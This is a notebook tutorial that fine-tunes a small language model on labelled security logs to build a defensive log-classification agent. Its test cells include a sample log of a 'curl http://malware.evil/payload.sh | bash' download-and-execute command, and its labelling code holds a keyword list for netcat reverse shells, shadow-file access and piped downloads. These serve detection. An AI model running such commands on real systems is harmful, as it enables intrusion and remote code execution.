# Blue Team AI Agent - Security Log Fine-Tuning with Unsloth

This notebook fine-tunes a language model on security logs to create a Blue Team AI Agent capable of:
- Classifying logs as benign or malicious
- Providing threat analysis and reasoning
- Detecting security anomalies in SIEM/security tool output

**Based on**: Unsloth GPT-OSS Fine-tuning notebook
**Dataset**: Needle-in-the-Logstack security logs (JSONL format)

## Why Fine-Tuning vs RAG?
- **Faster inference**: No retrieval overhead at query time
- **Baked-in knowledge**: Model learns log patterns intrinsically
- **Smaller deployment**: Single model vs model + vector store
- **Consistent analysis**: Deterministic classification behavior

## Step 1: Install Dependencies

Install Unsloth and required packages. This cell is optimized for Google Colab with GPU.

In [None]:
%%capture
!pip install unsloth
# Get latest Unsloth
!pip uninstall unsloth -y && pip install --upgrade --no-cache-dir --no-deps git+https://github.com/unslothai/unsloth.git

## Step 2: Load the Model

We'll use a smaller model suitable for Colab's T4/A100 GPU. You can swap this for larger models if you have more VRAM.

**Model Options:**
- `unsloth/Llama-3.2-3B-Instruct` - 3B params, fast, good for T4
- `unsloth/Llama-3.1-8B-Instruct` - 8B params, better quality
- `unsloth/Qwen2.5-7B-Instruct` - 7B params, excellent reasoning
- `unsloth/gpt-oss-20B-bnb-4bit` - 20B params, requires A100

In [None]:
from unsloth import FastLanguageModel
import torch

# Configuration
max_seq_length = 2048  # Can increase for longer logs
dtype = None  # Auto-detect (float16 for T4, bfloat16 for A100)
load_in_4bit = True  # Use QLoRA for memory efficiency

# Choose model based on your GPU
# For T4 (Colab free):
model_name = "unsloth/Llama-3.2-3B-Instruct-bnb-4bit"
# For A100 (Colab Pro/Enterprise):
# model_name = "unsloth/Llama-3.1-8B-Instruct-bnb-4bit"

model, tokenizer = FastLanguageModel.from_pretrained(
    model_name=model_name,
    max_seq_length=max_seq_length,
    dtype=dtype,
    load_in_4bit=load_in_4bit,
)

print(f"Model loaded: {model_name}")
print(f"Max sequence length: {max_seq_length}")

## Step 3: Configure LoRA Adapters

LoRA (Low-Rank Adaptation) allows efficient fine-tuning by only training a small subset of parameters.

In [None]:
model = FastLanguageModel.get_peft_model(
    model,
    r=16,  # LoRA rank - higher = more capacity, more VRAM
    target_modules=[
        "q_proj", "k_proj", "v_proj", "o_proj",
        "gate_proj", "up_proj", "down_proj",
    ],
    lora_alpha=16,
    lora_dropout=0,  # 0 is optimized
    bias="none",     # "none" is optimized
    use_gradient_checkpointing="unsloth",  # 30% less VRAM
    random_state=42,
    use_rslora=False,
    loftq_config=None,
)

print("LoRA adapters configured!")

## Step 4: Load and Prepare Security Log Dataset

We'll load the JSONL security logs and transform them into an instruction-following format.

**Original log format:**
```json
{"log_id": "605e7781", "statement": "Aug 07 13:30:12 mail01 sudo: ...", "label": "benign"}
```

**Target format for training:**
```json
{
  "instruction": "Analyze this security log entry...",
  "input": "<the log statement>",
  "output": "Classification: benign/malicious\nAnalysis: ..."
}
```

In [None]:
from datasets import load_dataset
import json

# Load the security logs from GitHub
LOGS_URL = "https://raw.githubusercontent.com/iknowjason/cisco-foundation-notebooks/main/data/needle-in-the-logstack/medium_labelled.jsonl"

# Load JSONL dataset
raw_dataset = load_dataset(
    "json",
    data_files={"train": LOGS_URL},
    split="train"
)

print(f"Loaded {len(raw_dataset)} log entries")
print(f"Columns: {raw_dataset.column_names}")
print(f"\nSample entry:")
print(json.dumps(raw_dataset[0], indent=2))

In [None]:
# Check label distribution
from collections import Counter

labels = [entry["label"] for entry in raw_dataset]
label_counts = Counter(labels)

print("Label Distribution:")
for label, count in label_counts.items():
    print(f"  {label}: {count} ({count/len(labels)*100:.1f}%)")

## Step 5: Transform Logs to Instruction Format

We'll create rich instruction-response pairs that teach the model to:
1. Classify log entries
2. Explain the reasoning
3. Identify indicators of compromise (IOCs)

In [None]:
import random

# Define instruction templates for variety
INSTRUCTIONS = [
    "Analyze this security log entry and classify it as benign or malicious. Provide your reasoning.",
    "As a Blue Team analyst, examine this log and determine if it indicates a security threat.",
    "Review this system log for potential malicious activity. Classify and explain.",
    "Evaluate this log entry from a security perspective. Is this normal behavior or suspicious?",
    "Perform threat analysis on this log entry. Classify as benign or malicious with justification.",
]

# Generate detailed responses based on label and log content
def generate_response(log_entry, label):
    """Generate a detailed analyst response for the log entry."""
    statement = log_entry["statement"]
    
    if label == "malicious":
        # Analyze the malicious log to generate specific reasoning
        indicators = []
        
        if "crontab" in statement.lower():
            indicators.append("Crontab modification detected - potential persistence mechanism")
        if "authorized_keys" in statement.lower() or ".ssh" in statement.lower():
            indicators.append("SSH key manipulation - possible unauthorized access setup")
        if "nmap" in statement.lower() or "scan" in statement.lower():
            indicators.append("Network scanning activity - reconnaissance behavior")
        if "passwd" in statement.lower() or "shadow" in statement.lower():
            indicators.append("Password file access - credential harvesting attempt")
        if "nc " in statement.lower() or "netcat" in statement.lower():
            indicators.append("Netcat usage - potential reverse shell or data exfiltration")
        if "/tmp/" in statement and any(x in statement.lower() for x in ["sh", "bash", "python", "perl"]):
            indicators.append("Script execution from /tmp - common malware staging location")
        if "wget" in statement.lower() or "curl" in statement.lower():
            if "/tmp" in statement or "| sh" in statement or "| bash" in statement:
                indicators.append("Download and execute pattern - malware delivery technique")
        
        if not indicators:
            indicators.append("Suspicious privileged command execution pattern")
        
        response = f"""**Classification: MALICIOUS**

**Threat Level:** HIGH

**Indicators of Compromise (IOCs):**
{"".join(f"- {ind}" + chr(10) for ind in indicators)}
**Recommended Actions:**
1. Isolate the affected host immediately
2. Capture forensic evidence before remediation
3. Check for lateral movement to other systems
4. Review authentication logs for the involved user account
5. Escalate to incident response team"""
    
    else:  # benign
        activities = []
        
        if "systemctl" in statement.lower() or "service" in statement.lower():
            activities.append("Routine service management operation")
        if "apt" in statement.lower() or "yum" in statement.lower() or "dnf" in statement.lower():
            activities.append("Standard package management activity")
        if "tail" in statement.lower() or "cat" in statement.lower() or "less" in statement.lower():
            activities.append("Log file or configuration review")
        if "ls" in statement.lower() or "pwd" in statement.lower() or "df" in statement.lower():
            activities.append("System status check or filesystem navigation")
        if "nginx" in statement.lower() or "apache" in statement.lower() or "httpd" in statement.lower():
            activities.append("Web server administration")
        if "mysql" in statement.lower() or "postgres" in statement.lower():
            activities.append("Database administration activity")
        
        if not activities:
            activities.append("Standard system administration command")
        
        response = f"""**Classification: BENIGN**

**Confidence:** HIGH

**Analysis:**
{"".join(f"- {act}" + chr(10) for act in activities)}
**Assessment:**
This appears to be legitimate administrative activity. The command execution pattern is consistent with normal system maintenance and operations. No indicators of compromise detected.

**Recommended Actions:**
- No immediate action required
- Continue standard monitoring"""
    
    return response


def transform_to_instruction_format(examples):
    """Transform security logs to instruction-following format."""
    texts = []
    
    for i in range(len(examples["log_id"])):
        log_entry = {
            "log_id": examples["log_id"][i],
            "statement": examples["statement"][i],
            "label": examples["label"][i],
        }
        
        # Select random instruction for variety
        instruction = random.choice(INSTRUCTIONS)
        
        # Generate detailed response
        response = generate_response(log_entry, log_entry["label"])
        
        # Format as chat conversation
        messages = [
            {
                "role": "system",
                "content": "You are an expert Blue Team security analyst specializing in log analysis, threat detection, and incident response. Analyze security logs thoroughly and provide detailed assessments."
            },
            {
                "role": "user",
                "content": f"{instruction}\n\n**Log Entry:**\n```\n{log_entry['statement']}\n```"
            },
            {
                "role": "assistant",
                "content": response
            }
        ]
        
        # Apply chat template
        text = tokenizer.apply_chat_template(
            messages,
            tokenize=False,
            add_generation_prompt=False
        )
        texts.append(text)
    
    return {"text": texts}


# Transform the dataset
print("Transforming dataset to instruction format...")
dataset = raw_dataset.map(
    transform_to_instruction_format,
    batched=True,
    remove_columns=raw_dataset.column_names,
)

print(f"\nTransformed {len(dataset)} examples")
print(f"\nSample transformed entry (first 1000 chars):")
print(dataset[0]["text"][:1000])

## Step 6: Train the Model

Now we train using Unsloth's optimized SFTTrainer.

In [None]:
from trl import SFTTrainer, SFTConfig

trainer = SFTTrainer(
    model=model,
    tokenizer=tokenizer,
    train_dataset=dataset,
    args=SFTConfig(
        dataset_text_field="text",
        max_seq_length=max_seq_length,
        per_device_train_batch_size=2,
        gradient_accumulation_steps=4,
        warmup_steps=5,
        num_train_epochs=3,  # Adjust based on dataset size
        # max_steps=100,  # Uncomment to limit steps for testing
        learning_rate=2e-4,
        fp16=not torch.cuda.is_bf16_supported(),
        bf16=torch.cuda.is_bf16_supported(),
        logging_steps=10,
        optim="adamw_8bit",
        weight_decay=0.01,
        lr_scheduler_type="linear",
        seed=42,
        output_dir="outputs",
        report_to="none",  # Set to "wandb" for W&B logging
    ),
)

print("Training configuration ready!")
print(f"  Batch size: 2")
print(f"  Gradient accumulation: 4")
print(f"  Effective batch size: 8")
print(f"  Learning rate: 2e-4")
print(f"  Epochs: 3")

In [None]:
# GPU memory stats before training
gpu_stats = torch.cuda.get_device_properties(0)
start_gpu_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
max_memory = round(gpu_stats.total_memory / 1024 / 1024 / 1024, 3)
print(f"GPU: {gpu_stats.name}")
print(f"Max memory: {max_memory} GB")
print(f"Reserved before training: {start_gpu_memory} GB")

In [None]:
# Start training!
print("Starting training...")
trainer_stats = trainer.train()

# Training stats
used_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
used_memory_for_training = round(used_memory - start_gpu_memory, 3)

print(f"\n{'='*50}")
print("Training Complete!")
print(f"{'='*50}")
print(f"Training time: {trainer_stats.metrics['train_runtime']:.2f} seconds")
print(f"Peak GPU memory: {used_memory} GB")
print(f"Memory used for training: {used_memory_for_training} GB")

## Step 7: Test the Fine-Tuned Model

Let's test our Blue Team AI Agent on new log entries!

In [None]:
# Enable inference mode (2x faster)
FastLanguageModel.for_inference(model)

def analyze_log(log_statement: str) -> str:
    """Analyze a security log using the fine-tuned model."""
    messages = [
        {
            "role": "system",
            "content": "You are an expert Blue Team security analyst specializing in log analysis, threat detection, and incident response. Analyze security logs thoroughly and provide detailed assessments."
        },
        {
            "role": "user",
            "content": f"Analyze this security log entry and classify it as benign or malicious. Provide your reasoning.\n\n**Log Entry:**\n```\n{log_statement}\n```"
        }
    ]
    
    inputs = tokenizer.apply_chat_template(
        messages,
        tokenize=True,
        add_generation_prompt=True,
        return_tensors="pt"
    ).to("cuda")
    
    outputs = model.generate(
        input_ids=inputs,
        max_new_tokens=512,
        use_cache=True,
        temperature=0.7,
        top_p=0.9,
    )
    
    response = tokenizer.decode(outputs[0], skip_special_tokens=True)
    # Extract just the assistant's response
    if "assistant" in response.lower():
        response = response.split("assistant")[-1].strip()
    
    return response

print("Blue Team AI Agent ready for inference!")

In [None]:
# Test with a benign log
test_log_benign = "Aug 15 09:22:31 webserver01 sudo: admin : TTY=pts/0 ; PWD=/var/log ; USER=root ; COMMAND=/usr/bin/tail -f /var/log/nginx/access.log"

print("Testing BENIGN log:")
print(f"Log: {test_log_benign}")
print("\n" + "="*50)
print("Analysis:")
print(analyze_log(test_log_benign))

In [None]:
# Test with a malicious log
test_log_malicious = "Aug 15 02:14:55 server03 sudo: compromised_user : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/bin/bash -c 'curl http://malware.evil/payload.sh | bash'"

print("Testing MALICIOUS log:")
print(f"Log: {test_log_malicious}")
print("\n" + "="*50)
print("Analysis:")
print(analyze_log(test_log_malicious))

In [None]:
# Test with a suspicious log (lateral movement attempt)
test_log_suspicious = "Aug 15 03:45:22 db01 sudo: service_account : TTY=pts/2 ; PWD=/home/service_account ; USER=root ; COMMAND=/usr/bin/ssh -o StrictHostKeyChecking=no admin@10.0.0.50"

print("Testing SUSPICIOUS log (lateral movement):")
print(f"Log: {test_log_suspicious}")
print("\n" + "="*50)
print("Analysis:")
print(analyze_log(test_log_suspicious))

## Step 8: Save the Model

Save the fine-tuned model for deployment.

In [None]:
# Save locally
model.save_pretrained("blue_team_agent_lora")
tokenizer.save_pretrained("blue_team_agent_lora")

print("Model saved to ./blue_team_agent_lora/")

In [None]:
# Optional: Push to Hugging Face Hub
# Uncomment and set your HF token

# from huggingface_hub import login
# login(token="your_hf_token")

# model.push_to_hub("your-username/blue-team-agent-lora")
# tokenizer.push_to_hub("your-username/blue-team-agent-lora")

In [None]:
# Export to GGUF for llama.cpp / Ollama deployment
# This creates a quantized model for efficient inference

model.save_pretrained_gguf(
    "blue_team_agent_gguf",
    tokenizer,
    quantization_method="q4_k_m",  # Good balance of size/quality
)

print("GGUF model saved to ./blue_team_agent_gguf/")
print("\nTo use with Ollama:")
print("  1. Copy the .gguf file to your machine")
print("  2. Create a Modelfile with: FROM ./blue_team_agent.gguf")
print("  3. Run: ollama create blue-team-agent -f Modelfile")

## Step 9: Using Your Own Logs

To train on your own SIEM/security logs, follow this format:

In [None]:
# Example: Loading your own JSONL logs

CUSTOM_LOGS_FORMAT = """
Your JSONL file should have this format (one JSON object per line):

{"log_id": "unique_id", "statement": "your log entry here", "label": "benign"}
{"log_id": "unique_id", "statement": "your log entry here", "label": "malicious"}

Required fields:
- log_id: Unique identifier (can be any string)
- statement: The actual log entry text
- label: Either "benign" or "malicious"

To load from a local file:

    raw_dataset = load_dataset(
        "json",
        data_files={"train": "/path/to/your/logs.jsonl"},
        split="train"
    )

To load from Google Drive (in Colab):

    from google.colab import drive
    drive.mount('/content/drive')
    
    raw_dataset = load_dataset(
        "json",
        data_files={"train": "/content/drive/MyDrive/security_logs.jsonl"},
        split="train"
    )
"""

print(CUSTOM_LOGS_FORMAT)

In [None]:
# Helper function to convert your existing logs to the required format

def convert_logs_to_training_format(
    input_file: str,
    output_file: str,
    log_field: str = "message",  # Field containing the log text
    label_field: str = None,  # If you have labels, specify the field
    default_label: str = "unknown",  # Default if no labels
):
    """
    Convert arbitrary JSONL logs to the training format.
    
    Args:
        input_file: Path to your JSONL logs
        output_file: Path for the converted output
        log_field: Name of the field containing the log text
        label_field: Name of the field containing labels (if any)
        default_label: Default label if none provided
    """
    import json
    import uuid
    
    converted = []
    
    with open(input_file, 'r') as f:
        for line in f:
            entry = json.loads(line.strip())
            
            # Extract log text
            if log_field in entry:
                statement = entry[log_field]
            else:
                # Try to concatenate all string fields
                statement = " | ".join(
                    f"{k}={v}" for k, v in entry.items() 
                    if isinstance(v, (str, int, float))
                )
            
            # Extract label
            if label_field and label_field in entry:
                label = entry[label_field]
            else:
                label = default_label
            
            converted.append({
                "log_id": str(uuid.uuid4())[:8],
                "statement": statement,
                "label": label,
            })
    
    with open(output_file, 'w') as f:
        for entry in converted:
            f.write(json.dumps(entry) + '\n')
    
    print(f"Converted {len(converted)} entries to {output_file}")
    return converted

# Example usage:
# convert_logs_to_training_format(
#     input_file="/path/to/splunk_export.jsonl",
#     output_file="/path/to/training_data.jsonl",
#     log_field="_raw",  # Splunk's raw log field
#     label_field="threat_level",  # Your custom label field
# )

## Summary

You've successfully:

1. **Loaded** a pre-trained LLM with Unsloth's optimizations
2. **Configured** LoRA adapters for efficient fine-tuning
3. **Transformed** JSONL security logs into instruction format
4. **Trained** the model to analyze security logs
5. **Tested** the Blue Team AI Agent
6. **Saved** the model for deployment

### Next Steps

- **Add more data**: Collect logs from your actual SIEM/security tools
- **Label your data**: Create ground-truth labels for supervised learning
- **Expand log types**: Add firewall, WAF, EDR, and other security logs
- **Deploy**: Use Ollama, vLLM, or llama.cpp for production inference
- **Integrate**: Connect to your SIEM for real-time analysis

### Resources

- [Unsloth Documentation](https://docs.unsloth.ai/)
- [Unsloth GitHub](https://github.com/unslothai/unsloth)
- [Dataset Guide](https://docs.unsloth.ai/get-started/fine-tuning-llms-guide/datasets-guide)